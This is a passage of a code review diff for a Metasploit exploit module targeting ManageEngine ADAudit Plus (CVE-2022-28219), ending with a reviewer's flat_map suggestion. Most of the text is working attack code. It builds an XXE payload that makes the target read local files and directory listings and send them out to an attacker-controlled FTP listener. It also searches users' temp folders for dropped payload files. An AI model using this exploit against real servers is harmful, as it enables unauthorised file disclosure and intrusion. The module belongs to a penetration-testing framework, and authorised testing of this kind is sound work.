modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb

```diff
@@ -0,0 +1,365 @@
+      'LocalPort' => datastore['SRVPORT_FTP'],
+      'LocalHost' => datastore['SRVHOST'],
+      'Context' => {
+        'Msf' => framework,
+        'MsfExploit' => self
+      }
+    )
+
+    # Trigger the XXE to get file listings
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI_XXE']).to_s,
+      'ctype' => 'application/json',
+      'data' => encode_xml("<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE data [<!ENTITY % file SYSTEM \"file:#{folder}\"><!ENTITY % dtd SYSTEM \"#{full_url}\"> %dtd;]><data>&send;</data>")
+    )
+
+    if res.code != 200
+      fail_with(Failure::Unknown, "XXE request to get directory listing failed with HTTP/#{res.code}")
+    end
+
+    # Accept an FTP session, and wait a short amount of time for data to come in
+    ftp_client = nil
+    ftp_data = ''
+    begin
+      # We don't have a good way to tell when the data is fully received, so
+      # wait for a short amount of time
+      Timeout.timeout(2) do # Be careful changing this timeout - this needs to run several times, potentially
+        ftp_client = ftp_server.accept
+
+        # Just enough FTP protocol to get what we need
+        ftp_client.print("200 hello I'm FTP\n")
+        ftp_client.print("331 password please\n")
+
+        # This technically sends too many requests for data, but that doesn't change anything
+        loop do
+          ftp_client.print("230 send data plz\n")
+          ftp_data += ftp_client.recv(256)
+        end
+      end
+    rescue Timeout::Error
+      # Do nothing, the FTP session is finished
+    ensure
+      ftp_server.close
+      if ftp_client
+        ftp_client.close
+      end
+    end
+
+    # If we actually received data, remove all the junk and split at newlines
+    if ftp_data =~ /RETR (.*)/m
+      return Regexp.last_match(1).split(/\n/).map(&:chomp)
+    end
+
+    # This is, unfortunately, the place where this fails the most - I'm not
+    # entirely sure why, but the reverse FTP connection seems to start failing
+    # if we mess with it too much. We do our best here to tell the user why.
+    if !ftp_client
+      print_warning("Didn't receive expected FTP connection")
+      return nil
+    end
+
+    if ftp_data.empty?
+      print_warning('FTP client connected, but we did not receive any data over the socket')
+      return nil
+    end
+
+    print_warning("FTP client connected, but we did not receive file list: #{ftp_data}")
+    return nil
+  end
+
+  def search_for_payloads(users)
+    return users.map do |u|
+      dir = "/users/#{u}/appdata/local/temp"
+      # This will search for the payload, but right now just print stuff
+      listing = get_directory_listing(dir)
+      if !listing
+        print_warning("Couldn't get directory listing for #{dir}")
+        next []
+      end
+
+      listing
+           .select { |f| f =~ /^jar_cache[0-9]+.tmp$/ }
+           .map { |f| File.join(dir, f) }
+    end.flatten
```

Comment:
```suggestion
    end
```

With the flat_map suggestion above